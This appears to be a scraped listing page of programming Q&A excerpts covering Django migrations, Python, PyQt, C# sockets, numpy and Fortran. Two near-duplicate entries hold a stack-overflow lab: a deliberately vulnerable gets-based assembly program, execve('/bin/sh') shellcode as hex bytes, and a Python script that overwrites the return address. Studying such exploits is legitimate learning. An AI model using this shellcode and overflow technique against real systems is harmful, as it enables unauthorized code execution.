and there is no table called thumbnail_kvstore, but I have a database backup, and in the backup files this table doesn't exist either. All the uploaded files I have are in media/uploads/media/. I'm also getting errors on some pages: Syntax error. Expected: ``thumbnail source geometry [key1=val1 key2=val2...] as var`` /usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/templatetags/thumbnail.py in __init__, line 72 In template /var/www/vhosts/domain.co.uk/sites/apps/shop/products/templates/products/product_detail.html, error at line 34 {% thumbnail image.file "800x700" detail as zoom %} Maybe some of the modules I installed are not the right version. I don't know how to fix it. I'm using CentOS 6, mod_wsgi, Apache, Python 2.6. Update 1.0: The old server ran Django 1.3; the new one runs Django 1.3.1. Update 1.1: I think I know where the problem is. I tried python manage.py syncdb and this is the output: Syncing... Creating tables ... The following content types are stale and need to be deleted: orders | ordercontact Any objects related to these content types by a foreign key will also be deleted. Are you sure you want to delete these content types? If you're unsure, answer 'no'. Type 'yes' to continue, or 'no' to cancel: no Installing custom SQL ... Installing indexes ... No fixtures found. Synced: > django.contrib.auth > django.contrib.contenttypes > django.contrib.sessions > django.contrib.sites > django.contrib.messages > django.contrib.admin > django.contrib.admindocs > django.contrib.markup > django.contrib.sitemaps > django.contrib.redirects > django_filters > freetext > sorl.thumbnail > django_extensions > south > currencies > pagination > tagging > honeypot > core > faq > logentry > menus > news > shop > shop.cart > shop.orders Not synced (use migrations): - dbtemplates - contactform - links - media - pages - popularity - testimonials - shop.brands - shop.collections - shop.discount - shop.pricing - shop.product_types - shop.products - shop.shipping - shop.tax (use ./manage.py migrate to migrate these) Next I ran python manage.py migrate, and that's what I got: Running migrations for dbtemplates: - Migrating forwards to 0002_auto__del_unique_template_name. > dbtemplates:0001_initial ! 
Error found during real run of migration! Aborting. ! Since you have a database that does not support running ! schema-altering statements in transactions, we have had ! to leave it in an interim state between migrations. ! You *might* be able to recover with: = DROP TABLE `django_template` CASCADE; [] = DROP TABLE `django_template_sites` CASCADE; [] ! The South developers regret this has happened, and would ! like to gently persuade you to consider a slightly ! easier-to-deal-with DBMS. ! NOTE: The error which caused the migration to fail is further up. Traceback (most recent call last): File "manage.py", line 13, in <module> execute_manager(settings) File "/usr/lib/python2.6/site-packages/django/core/management/__init__.py", line 438, in execute_manager utility.execute() File "/usr/lib/python2.6/site-packages/django/core/management/__init__.py", line 379, in execute self.fetch_command(subcommand).run_from_argv(self.argv) File "/usr/lib/python2.6/site-packages/django/core/management/base.py", line 191, in run_from_argv self.execute(*args, **options.__dict__) File "/usr/lib/python2.6/site-packages/django/core/management/base.py", line 220, in execute output = self.handle(*args, **options) File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/management/commands/migrate.py", line 105, in handle ignore_ghosts = ignore_ghosts, File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/__init__.py", line 191, in migrate_app success = migrator.migrate_many(target, workplan, database) File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/migrators.py", line 221, in migrate_many result = migrator.__class__.migrate_many(migrator, target, migrations, database) File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/migrators.py", line 292, in migrate_many result = self.migrate(migration, database) File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/migrators.py", line 125, in migrate result = self.run(migration) File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/migrators.py", line 99, in run return self.run_migration(migration) File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/migrators.py", line 81, in run_migration migration_function() File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/migrators.py", line 57, in <lambda> return (lambda: direction(orm)) File "/usr/lib/python2.6/site-packages/django_dbtemplates-1.3-py2.6.egg/dbtemplates/migrations/0001_initial.py", line 18, in forwards ('last_changed', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)), File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/db/generic.py", line 226, in create_table ', '.join([col for col in columns if col]), File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/db/generic.py", line 150, in execute cursor.execute(sql, params) File "/usr/lib/python2.6/site-packages/django/db/backends/util.py", line 34, in execute return self.cursor.execute(sql, params) File "/usr/lib/python2.6/site-packages/django/db/backends/mysql/base.py", line 86, in execute return self.cursor.execute(query, args) File "/usr/lib64/python2.6/site-packages/MySQLdb/cursors.py", line 174, in execute self.errorhandler(self, exc, value) File "/usr/lib64/python2.6/site-packages/MySQLdb/connections.py", line 36, in defaulterrorhandler raise errorclass, errorvalue _mysql_exceptions.OperationalError: (1050, "Table 
'django_template' already exists") Also i run python manage.py migrate --list, and uotput is: dbtemplates (*) 0001_initial (*) 0002_auto__del_unique_template_name contactform (*) 0001_initial (*) 0002_auto__add_callback (*) 0003_auto__add_field_callback_notes (*) 0004_auto__add_field_callback_is_closed__add_field_callback_closed (*) 0005_auto__add_field_callback_url (*) 0006_auto__add_contact (*) 0007_auto__add_field_contact_category (*) 0008_auto__add_field_contact_url links (*) 0001_initial (*) 0002_auto__add_field_category_enabled__add_field_category_order media (*) 0001_initial (*) 0002_auto__del_field_image_external_url__add_field_image_link_url__del_fiel (*) 0003_add_model_FileAttachment (*) 0004_auto__chg_field_file_slug__chg_field_image_slug (*) 0005_auto__chg_field_image_file (*) 0006_auto__chg_field_file_file pages (*) 0001_initial (*) 0002_auto__chg_field_page_meta_description__chg_field_page_meta_title__chg_ (*) 0003_auto__add_field_page_show_in_sitemap (*) 0004_auto__add_field_page_changefreq__add_field_page_priority popularity (*) 0001_initial testimonials (*) 0001_initial (*) 0002_auto__add_field_testimonial_is_featured brands (*) 0001_initial (*) 0002_auto__add_field_brand_template (*) 0003_auto__chg_field_brand_meta_description__chg_field_brand_meta_title__ch (*) 0004_auto__add_field_brand_url (*) 0005_auto__del_field_brand_image__add_field_brand_logo collections (*) 0001_initial (*) 0002_auto__add_field_collection_discount (*) 0003_auto__chg_field_collection_meta_description__chg_field_collection_meta (*) 0004_auto__add_field_collection_is_featured (*) 0005_auto__add_field_collection_order discount (*) 0001_initial (*) 0002_added_field_discount_description (*) 0003_auto__add_field_discountvoucher_automatic (*) 0004_auto__add_field_discountvoucher_collection (*) 0005_auto__del_field_discountvoucher_collection (*) 0006_auto__chg_field_discountvoucher_expiry_date pricing (*) 0001_initial (*) 0002_auto__add_pricingrule product_types (*) 0001_initial (*) 0002_auto__add_field_producttype_meta_title__add_field_producttype_meta_des (*) 0003_auto__add_field_producttype_summary__add_field_producttype_description products (*) 0001_initial (*) 0002_auto__del_field_product_is_featured (*) 0003_auto__chg_field_product_meta_keywords__chg_field_product_meta_descript (*) 0004_auto shipping (*) 0001_initial (*) 0002_auto__add_field_shippingmethod_includes_tax__add_field_shippingmethod_ (*) 0003_auto__add_field_shippingmethod_order (*) 0004_auto__del_field_shippingmethod_tax_rate__del_field_shippingmethod_incl (*) 0005_auto__del_field_shippingrule_enabled tax (*) 0001_initial (*) 0002_auto__add_field_taxrate_internal_name (*) 0003_initial_internal_names (*) 0004_auto__add_unique_taxrate_internal_name (*) 0005_force_unique_taxrate_name (*) 0006_auto__add_unique_taxrate_name After that some images source were something like this: src="cache/1e/bd/1ebd719910aa843238028edd5fe49e71.jpg" Is any1 could help me with syncdb pledase?

    Read the article

  • Python: speed up removal of every n-th element from list.

    - by ChristopheD
    I'm trying to solve this programming riddle and although the solution (see code below) works correctly, it is too slow for successful submission. Any pointers on how to make this run faster (removal of every n-th element from a list)? Or suggestions for a better algorithm to calculate the same; it seems I can't think of anything other than brute force for now... Basically the task at hand is: GIVEN: L = [2,3,4,5,6,7,8,9,10,11,........] 1. Take the first remaining item in list L (in the general case 'n'). Move it to the 'lucky number list'. Then drop every 'n-th' item from the list. 2. Repeat 1 TASK: Calculate the n-th number from the 'lucky number list' ( 1 <= n <= 3000) My current code (it calculates the first 3000 lucky numbers in about a second on my machine - but unfortunately too slow): """ SPOJ Problem Set (classical) 1798. Assistance Required URL: http://www.spoj.pl/problems/ASSIST/ """ sieve = range(3, 33900, 2) luckynumbers = [2] while True: wanted_n = input() if wanted_n == 0: break while len(luckynumbers) < wanted_n: item = sieve[0] luckynumbers.append(item) items_to_delete = set(sieve[::item]) sieve = filter(lambda x: x not in items_to_delete, sieve) print luckynumbers[wanted_n-1]
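
    A possible speed-up (an untested sketch of the same algorithm): deleting every item-th element in place with an extended slice avoids rebuilding the list through filter() and the set membership test on every element.

        # Python 2, matching the original script.
        sieve = range(3, 33900, 2)
        luckynumbers = [2]
        while len(luckynumbers) < 3000:
            item = sieve[0]
            luckynumbers.append(item)
            # Drops sieve[0], sieve[item], sieve[2*item], ... in one C-level pass,
            # which is equivalent to the set/filter step in the original code.
            del sieve[::item]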

    Read the article

  • PyQt and unittest - how to handle signals and slots

    - by Einar
    Hello, a small application I'm developing uses a module I have written to check certain web services via a REST API. I've been trying to add unit tests to it so I don't break stuff, and I stumbled upon a problem. I use a lot of signal-slot connections to perform operations asynchronously. For example, a typical test would be (pseudo-Python), with postDataDownloaded as a signal: def testConnection(self): "Test connection and posts retrieved" def length_test(): self.assertEqual(len(self.client.post_data), 5) self.client.postDataReady.connect(length_test) self.client.get_post_list(limit=5) Now, unittest will report this test as "ok" when running, regardless of the result (as another slot is being called), even if the asserts fail (I will get an unhandled AssertionError). Example output when deliberately making the test fail: Test connection and posts retrieved ... ok [... more tests...] OK Traceback (most recent call last): [...] AssertionError: 4 != 5 The slot inside the test is merely an experiment: I get the same results if it's outside (instance method). I should also add that the various methods I'm calling all make HTTP requests, which means they take a bit of time (I need to mock the request - in the meantime I'm using SimpleHTTPServer to fake the connections and give them proper data). Is there a way around this problem?
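
    One way to make the test actually wait for the asynchronous result (a sketch, assuming PyQt4, an existing QApplication for the test run, and that postDataReady is emitted once the data has arrived): spin a local QEventLoop until the signal fires, with a timeout so a broken client cannot hang the suite, then assert in the test method itself so unittest sees the failure.

        from PyQt4.QtCore import QEventLoop, QTimer

        def testConnection(self):
            "Test connection and posts retrieved"
            loop = QEventLoop()
            self.client.postDataReady.connect(loop.quit)
            QTimer.singleShot(5000, loop.quit)   # safety timeout: 5 seconds
            self.client.get_post_list(limit=5)
            loop.exec_()                          # returns when the signal (or timeout) fires
            self.assertEqual(len(self.client.post_data), 5)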

    Read the article

  • Binary stream 'NN' does not contain a valid BinaryHeader. Possible causes are invalid stream or obje

    - by FinancialRadDeveloper
    I am passing user-defined classes over sockets. The SendObject code is below. It works on my local machine, but when I publish to the web server, which then communicates with the app server on my own machine, it fails. public bool SendObject(Object obj, ref string sErrMsg) { try { MemoryStream ms = new MemoryStream(); BinaryFormatter bf1 = new BinaryFormatter(); bf1.Serialize(ms, obj); byte[] byArr = ms.ToArray(); int len = byArr.Length; m_socClient.Send(byArr); return true; } catch (Exception e) { sErrMsg = "SendObject Error: " + e.Message; return false; } } I can do this fine with one class in my tools project, but the other class, UserData, just doesn't want to know. Frustrating! I think it's because the UserData class has a DataSet inside it. Funnily enough I have seen this work, but after 1 request it goes loopy and I can't get it to work again. Anyone know why this might be? I have compared the dlls to make sure they are the same on the web server and on my local machine, and they look to be, as I have turned on versioning in the AssemblyInfo.cs to double check. Edit: OK, it seems that the problem is with size. If I keep it under 1024 bytes (I am guessing here) it works on the web server, and it doesn't if it has a DataSet inside it. In fact this is so puzzling I converted the DataSet to a string using ds.GetXml() and this also causes it to blow up. :( So it seems that across the network something with my sockets is wrong and doesn't want to read in the data. JonSkeet where are you. ha ha. I would offer Rep but I don't have any. Grr
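
    A plausible cause (an assumption from the symptoms, not verified): TCP is a byte stream, so a single Send can arrive split across several reads once the payload no longer fits in one segment, and deserialising a partial buffer produces exactly this kind of "invalid BinaryHeader" error. The usual fix is to length-prefix each message and keep reading until the whole payload has arrived; the idea is sketched below in Python for brevity, with hypothetical helper names.

        import socket, struct

        def send_message(sock, payload):
            # 4-byte big-endian length prefix, then the serialized bytes.
            sock.sendall(struct.pack('>I', len(payload)) + payload)

        def recv_exact(sock, n):
            # Keep reading until exactly n bytes have been received.
            buf = b''
            while len(buf) < n:
                chunk = sock.recv(n - len(buf))
                if not chunk:
                    raise IOError('connection closed mid-message')
                buf += chunk
            return buf

        def recv_message(sock):
            (length,) = struct.unpack('>I', recv_exact(sock, 4))
            return recv_exact(sock, length)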

    Read the article

  • Shellcode for a simple stack overflow: Exploited program with shell terminates directly after execve

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. The execve syscall succeeds but afterwards it just terminates. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328 Debugging with gdb: $ python exploit.py > exploit.txt (Note: corrected stackpointer address in exploit.py for gdb) $ gdb buffer (gdb) run < exploit.txt Starting program: /home/henning/bo/buffer < exploit.txt Stackpointer 0x7fffffffe308 Jump to 0x7fffffffe308 process 4185 is executing new program: /bin/dash Program exited normally.

    Read the article

  • Pythonic mapping of an array (Beginner)

    - by scott_karana
    Hey StackOverflow, I've got a question related to a beginner Python snippet I've written to introduce myself to the language. It's an admittedly trivial early effort, but I'm still wondering how I could have written it more elegantly. The program outputs readable NATO phonetic versions of an argument, such as "H2O" -> "Hotel 2 Oscar", or (lacking an argument) just outputs the whole alphabet. I mainly use it for calling in MAC addresses and IQNs, but it's useful for other phone support too. Here's the body of the relevant portion of the program: #!/usr/bin/env python import sys nato = { "a": 'Alfa', "b": 'Bravo', "c": 'Charlie', "d": 'Delta', "e": 'Echo', "f": 'Foxtrot', "g": 'Golf', "h": 'Hotel', "i": 'India', "j": 'Juliet', "k": 'Kilo', "l": 'Lima', "m": 'Mike', "n": 'November', "o": 'Oscar', "p": 'Papa', "q": 'Quebec', "r": 'Romeo', "s": 'Sierra', "t": 'Tango', "u": 'Uniform', "v": 'Victor', "w": 'Whiskey', "x": 'Xray', "y": 'Yankee', "z": 'Zulu', } if len(sys.argv) < 2: for n in nato.keys(): print nato[n] else: # if sys.argv[1] == "-i" # TODO for char in sys.argv[1].lower(): if char in nato: print nato[char], else: print char, As I mentioned, I just want to see suggestions for a more elegant way to code this. My first guess was to use a list comprehension along the lines of [nato[x] for x in sys.argv[1].lower() if x in nato], but that doesn't allow me to output any non-alphabetic characters. My next guess was to use map, but I couldn't format any lambdas that didn't suffer from the same corner case. Any suggestions? Maybe something with first-class functions? Messing with Array's guts? This seems like it could almost be a Code Golf question, but I feel like I'm just overthinking :)
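
    One tidier version of the lookup (a sketch reusing the nato dict above): dict.get with a default keeps the fall-through behaviour for digits and punctuation without an explicit if/else.

        # Python 2, matching the original script.
        import sys

        if len(sys.argv) < 2:
            print '\n'.join(nato[key] for key in sorted(nato))
        else:
            word = sys.argv[1].lower()
            # dict.get falls back to the character itself for anything not in the table.
            print ' '.join(nato.get(char, char) for char in word)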

    Read the article

  • Attempting my first fortran 95 program, to solve quadratic eqn. Getting weird errors.

    - by Damon
    So, I'm attempting my first program in Fortran, trying to solve quadratic eqn. I have double and triple checked my code and don't see anything wrong. I keep getting "Invalid character in name at (1)" and "Unclassifiable statement at (1)" at various locations. Any help would be greatly appreciated... ! This program solves quadratic equations ! of the form ax^2 + bx + c = 0. ! Record: ! Name: Date: Notes: ! Damon Robles 4/3/10 Original Code PROGRAM quad_solv IMPLICIT NONE ! Variables REAL :: a, b, c REAL :: discrim, root1, root2, COMPLEX :: comp1, comp2 CHARACTER(len=1) :: correct ! Prompt user for coefficients. WRITE(*,*) "This program solves quadratic equations " WRITE(*,*) "of the form ax^2 + bx + c = 0. " WRITE(*,*) "Please enter the coefficients a, b, and " WRITE(*,*) "c, separated by commas:" READ(*,*) a, b, c WRITE(*,*) "Is this correct: a = ", a, " b = ", b WRITE(*,*) " c = ", c, " [Y/N]? " READ(*,*) correct IF correct = N STOP IF correct = Y THEN ! Definition discrim = b**2 - 4*a*c ! Calculations IF discrim > 0 THEN root1 = (-b + sqrt(discrim))/(2*a) root2 = (-b - sqrt(discrim))/(2*a) WRITE(*,*) "This equation has two real roots. " WRITE(*,*) "x1 = ", root1 WRITE(*,*) "x2 = ", root2 IF discrim = 0 THEN root1 = -b/(2*a) WRITE(*,*) "This equation has a double root. " WRITE(*,*) "x1 = ", root1 IF discrim < 0 THEN comp1 = (-b + sqrt(discrim))/(2*a) comp2 = (-b - sqrt(discrim))/(2*a) WRITE(*,*) "x1 = ", comp1 WRITE(*,*) "x2 = ", comp2 PROGRAM END quad_solv Thanks in advance!

    Read the article

  • slicing a 2d numpy array

    - by MedicalMath
    The following code: import numpy as p myarr=[[0,1],[0,6],[0,1],[0,6],[0,1],[0,6],[0,1],[0,6],[0,1],[0,6],[0,1],[0,6],[0,1],[0,6],[0,1],[0,6],[0,1],[0,6]] copy=p.array(myarr) p.mean(copy)[:,1] Is generating the following error message: Traceback (most recent call last): File "<pyshell#3>", line 1, in <module> p.mean(copy)[:,1] IndexError: 0-d arrays can only use a single () or a list of newaxes (and a single ...) as an index I looked up the syntax at this link and I seem to be using the correct syntax to slice. However, when I type copy[:,1] into the Python shell, it gives me the following output, which is clearly wrong, and is probably what is throwing the error: array([1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6]) Can anyone show me how to fix my code so that I can extract the second column and then take the mean of the second column as intended in the original code above? EDIT: Thank you for your solutions. However, my posting was an oversimplification of my real problem. I used your solutions in my real code, and got a new error. Here is my real code with one of your solutions that I tried: filteredSignalArray=p.array(filteredSignalArray) logical=p.logical_and(EndTime-10.0<=matchingTimeArray,matchingTimeArray<=EndTime) finalStageTime=matchingTimeArray.compress(logical) finalStageFiltered=filteredSignalArray.compress(logical) for j in range(len(finalStageTime)): if j == 0: outputArray=[[finalStageTime[j],finalStageFiltered[j]]] else: outputArray+=[[finalStageTime[j],finalStageFiltered[j]]] print 'outputArray[:,1].mean() is: ',outputArray[:,1].mean() And here is the error message that is now being generated by the new code: File "mypath\myscript.py", line 1545, in WriteToOutput10SecondsBeforeTimeMarker print 'outputArray[:,1].mean() is: ',outputArray[:,1].mean() TypeError: list indices must be integers, not tuple Second EDIT: This is solved now that I added: outputArray=p.array(outputArray) above my code. I have been at this too many hours and need to take a break for a while if I am making these kinds of mistakes.
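
    For reference, the slice itself was fine; the mean just needs to be taken of the sliced column (and, as the second edit notes, the data must be a numpy array rather than a plain list). A minimal sketch:

        import numpy as p

        myarr = [[0, 1], [0, 6]] * 9          # same shape as the original 18-row data
        copy = p.array(myarr)

        col = copy[:, 1]                       # second column: array([1, 6, 1, 6, ...])
        print col.mean()                       # 3.5
        # equivalently: p.mean(copy[:, 1]) or p.mean(copy, axis=0)[1]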

    Read the article

  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328

    Read the article

  • What is the most platform- and Python-version-independent way to make a fast loop for use in Python?

    - by Statto
    I'm writing a scientific application in Python with a very processor-intensive loop at its core. I would like to optimise this as far as possible, at minimum inconvenience to end users, who will probably use it as an uncompiled collection of Python scripts, and will be using Windows, Mac, and (mainly Ubuntu) Linux. It is currently written in Python with a dash of NumPy, and I've included the code below. Is there a solution which would be reasonably fast which would not require compilation? This would seem to be the easiest way to maintain platform-independence. If using something like Pyrex, which does require compilation, is there an easy way to bundle many modules and have Python choose between them depending on detected OS and Python version? Is there an easy way to build the collection of modules without needing access to every system with every version of Python? Does one method lend itself particularly to multi-processor optimisation? (If you're interested, the loop is to calculate the magnetic field at a given point inside a crystal by adding together the contributions of a large number of nearby magnetic ions, treated as tiny bar magnets. Basically, a massive sum of these.) # calculate_dipole # ------------------------- # calculate_dipole works out the dipole field at a given point within the crystal unit cell # --- # INPUT # mu = position at which to calculate the dipole field # r_i = array of atomic positions # mom_i = corresponding array of magnetic moments # --- # OUTPUT # B = the B-field at this point def calculate_dipole(mu, r_i, mom_i): relative = mu - r_i r_unit = unit_vectors(relative) #4pi / mu0 (at the front of the dipole eqn) A = 1e-7 #initalise dipole field B = zeros(3,float) for i in range(len(relative)): #work out the dipole field and add it to the estimate so far B += A*(3*dot(mom_i[i],r_unit[i])*r_unit[i] - mom_i[i]) / sqrt(dot(relative[i],relative[i]))**3 return B
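
    One no-compilation option that often helps a lot here (a sketch, assuming r_i and mom_i are (N, 3) NumPy arrays and mu is a length-3 array, as in the original function): push the whole sum into NumPy so the Python-level loop disappears.

        import numpy as np

        def calculate_dipole_vectorized(mu, r_i, mom_i):
            # Same physics as the original loop, expressed as array operations.
            A = 1e-7
            relative = mu - r_i                                   # (N, 3) displacement vectors
            dist = np.sqrt((relative ** 2).sum(axis=1))           # (N,)  distances
            r_unit = relative / dist[:, np.newaxis]               # (N, 3) unit vectors
            proj = (mom_i * r_unit).sum(axis=1)                   # dot(mom_i[i], r_unit[i]) for each i
            terms = (3.0 * proj[:, np.newaxis] * r_unit - mom_i) / (dist ** 3)[:, np.newaxis]
            return A * terms.sum(axis=0)                          # total field, shape (3,)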

    Read the article

< Previous Page | 45 46 47 48 49 50 51 52 53 54 55 56  | Next Page >